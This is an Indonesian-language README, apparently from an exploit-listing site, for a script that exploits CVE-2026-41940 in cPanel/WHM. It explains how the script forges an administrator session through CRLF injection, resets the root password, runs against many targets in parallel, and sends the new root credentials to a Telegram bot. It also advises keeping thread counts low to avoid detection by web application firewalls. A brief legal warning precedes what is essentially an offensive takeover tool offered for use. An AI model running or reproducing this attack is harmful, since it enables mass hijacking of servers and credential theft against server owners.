Share
## https://sploitus.com/exploit?id=B58DD222-5323-5CB6-A503-F3979A576126
CVE-2026-41940 – cPanel/WHM Auth Bypass + Root Password Changer
Skrip ini mengeksploitasi kerentanan authentication bypass pada cPanel/WHM (CVE-2026-41940) menggunakan teknik CRLF injection untuk memalsukan sesi administrator. Setelah berhasil, skrip dapat mengubah kata sandi pengguna root di WHM dan mengirim notifikasi via Telegram.

Peringatan: Gunakan hanya untuk pengujian keamanan pada sistem yang Anda miliki atau telah mendapat izin tertulis. Penyalahgunaan skrip ini untuk akses ilegal melanggar hukum.

πŸ“¦ Instalasi Dependensi (PIP)
Skrip ini membutuhkan Python 3.6+ dan dua pustaka eksternal. Jalankan perintah berikut:

pip install requests urllib3
requests – untuk mengirim HTTP request yang fleksibel

urllib3 – digunakan untuk menonaktifkan peringatan SSL (self‑signed certificate)

Pustaka lainnya (argparse, json, re, threading, concurrent.futures, dll.) sudah tersedia di pustaka standar Python.

πŸš€ Cara Penggunaan
1. Persiapan Awal
Simpan skrip dengan nama misalnya cve-2026-41940.py.

(Opsional) Jika ingin notifikasi Telegram, edit dua baris di bagian HARDCODE TELEGRAM di dalam skrip:

python
TELEGRAM_BOT_TOKEN = 'token_bot_dari_BotFather'
TELEGRAM_CHAT_ID = 'chat_id_anda_atau_group'
Biarkan seperti semula (: dan -) jika tidak ingin notifikasi.

2. Sintaks Dasar
bash
python cve-2026-41940.py --target https://ip:2087 --password root123
python cve-2026-41940.py --targets-file targets.txt --password rahasia --threads 20 --output hasil.json
python cve-2026-41940.py --target https://ip:2087 --check-only
3. Argumen yang Tersedia
Argumen	Wajib?	Deskripsi
--target	salah satu	Target tunggal, contoh https://192.168.1.100:2087 atau 192.168.1.100 (port default 2087)
--targets-file	salah satu	File teks berisi daftar target (satu per baris, format ip:port atau URL lengkap)
--password	jika tidak --check-only	Kata sandi baru untuk user root WHM
--check-only	tidak	Hanya memeriksa apakah target rentan, tanpa mengubah kata sandi
--threads	tidak (default 10)	Jumlah thread untuk eksekusi paralel
--timeout	tidak (default 15)	Timeout koneksi HTTP (detik)
--output	tidak	Simpan hasil (JSON) ke file
Catatan: Port 2087 untuk WHM (SSL) akan ditambahkan otomatis jika tidak disebutkan.

4. Contoh Penggunaan
Periksa kerentanan satu target (tes saja):

bash
python cve-2026-41940.py --target https://203.0.113.10:2087 --check-only
Eksploitasi dan ganti password root menjadi p4ssw0rd!:

bash
python cve-2026-41940.py --target https://203.0.113.10:2087 --password p4ssw0rd!
Scan banyak target dari file list.txt dengan 20 thread, simpan hasil ke sukses.json:

bash
python cve-2026-41940.py --targets-file list.txt --password MyNewPass123 --threads 20 --output sukses.json
Contoh isi list.txt:

text
192.168.1.1:2087
https://cpanel.example.com
203.0.113.99
5. Output & Notifikasi
Setiap target akan dicetak statusnya di layar:
[+] sukses, [-] gagal, [!] error, [*] proses.

Jika --output disertakan, semua hasil akan disimpan dalam format JSON.

Jika kredensial Telegram diisi, eksploitasi yang berhasil akan mengirim pesan seperti:

text
βœ… SUCCESSFUL EXPLOIT βœ…
β”Œ Target: 203.0.113.10:2087
β”œ Username: root
β”œ Password: MyNewPass123
β”œ WHM Version: 122.0.19
β”” Time: 2025-03-20 10:15:30 UTC
βš™οΈ Cara Kerja Singkat
Pre‑auth – Mengirim login gagal untuk mendapatkan cookie whostmgrsession.

Injeksi CRLF – Menambahkan payload Basic  pada header Authorization untuk menyisipkan baris sesi palsu.

Propagasi – Mengakses /scripts2/listaccts untuk memastikan kerentanan dapat dieksploitasi.

Verifikasi – Memanggil json-api/version; jika berhasil, maka dapat mengakses WHM sebagai root.

Ganti Password – Memanggil API passwd dengan parameter user=root dan password baru.

Notifikasi – Mengirim hasil ke Telegram (jika token diisi).

⚠️ Catatan Penting
Skrip tidak mendeteksi versi cPanel/WHM secara langsung, tetapi akan menampilkan versi jika tersedia.

Beberapa target mungkin memiliki mod_security atau WAF yang memblokir payload. Gunakan --threads tidak terlalu tinggi untuk menghindari deteksi.

Selalu gunakan dengan izin dan tanggung jawab moral.

Author: dennisec (github.com/dennisec)
Lisensi: Educational use only